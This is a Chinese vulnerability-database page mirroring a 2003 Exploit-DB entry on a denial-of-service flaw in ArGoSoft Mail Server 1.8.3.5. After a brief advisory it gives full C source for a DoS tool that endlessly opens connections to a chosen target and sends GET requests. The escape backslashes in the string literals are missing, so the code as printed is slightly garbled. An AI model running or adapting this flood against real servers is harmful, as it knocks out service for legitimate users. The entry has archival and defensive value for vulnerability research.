ArGoSoft Mail Server 1.8.3.5 – GET Multiple Denial of Service Vulnerabilities

18次阅读
没有评论

ArGoSoft Mail Server 1.8.3.5 – GET Multiple Denial of Service Vulnerabilities

漏洞ID 1053950 漏洞类型
发布时间 2003-06-11 更新时间 2003-06-11
ArGoSoft Mail Server 1.8.3.5 - GET Multiple Denial of Service VulnerabilitiesCVE编号 N/A
ArGoSoft Mail Server 1.8.3.5 - GET Multiple Denial of Service VulnerabilitiesCNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22757
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7873/info

ArGoSoft Mail Server has been reported prone to a denial of service condition when handling multiple GET requests, in rapid succession.

An attacker may exploit this condition to effectively deny service to legitimate ArGoSoft Mail server users until the service is restarted.

/**********************************************************************************
*
*     Denial of Service Attack against ArGoSoft Mail Server Version 1.8
(1.8.3.5)
*
*    Tripbit Security Development
*    ---------------------------------
*
*    Author: posidron
*
*    Contact
*    [-] Mail: [email protected]
*    [-] Web: http://www.tripbit.org
*    [-] Forum: http://www.tripbit.org/wbboard
*    [-] IRC: irc.euirc.net 6667 #tripbit
*
*    Greets: Rushjo, Tec, STeFaN, Havoc][, MisterMoe, PeaceTreaty
*
**********************************************************************************/

#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
    int port, sockfd;
    struct sockaddr_in server;
    struct hostent *host;
    char sendstring[1024];

    strcpy(sendstring, "GET  /index.html HTTP/1.0nn");

    if(argc < 3)
    {
        printf("Usage: %s [target] <port>n", argv[0]);
        exit(0);
    }

    port = atoi(argv[2]);

    host = gethostbyname(argv[1]);
    if(host == NULL)
    {
        printf("Connection failed!...n");
        exit(0);
    }

    server.sin_family = AF_INET;
    server.sin_port = htons(port);
    server.sin_addr.s_addr = inet_addr((char*)argv[1]);

    printf("Dos against ArGoSoft Mail Server Version 1.8 (1.8.3.5)n");

    for(;;)
    {
        if( (sockfd = socket(AF_INET,SOCK_STREAM,0)) < 0)
        {
            printf("socket() failed!n");
            exit(0);
        }

        if(connect(sockfd, (struct sockaddr*)&server, sizeof(server)) < 0)
        {
            printf("connect() failed!n");
            close(sockfd);
        }

        if (write(sockfd, sendstring, strlen(sendstring)) < 0)
        {
            break;
        }

        close(sockfd);
    }

    printf("Attack done!...n");
}

相关推荐: Watchguard Soho Firewall FTP加密问题漏洞

Watchguard Soho Firewall FTP加密问题漏洞 漏洞ID 1203786 漏洞类型 未知 发布时间 2002-10-04 更新时间 2002-10-04 CVE编号 CVE-2002-1047 CNNVD-ID CNNVD-200210-…

正文完
 0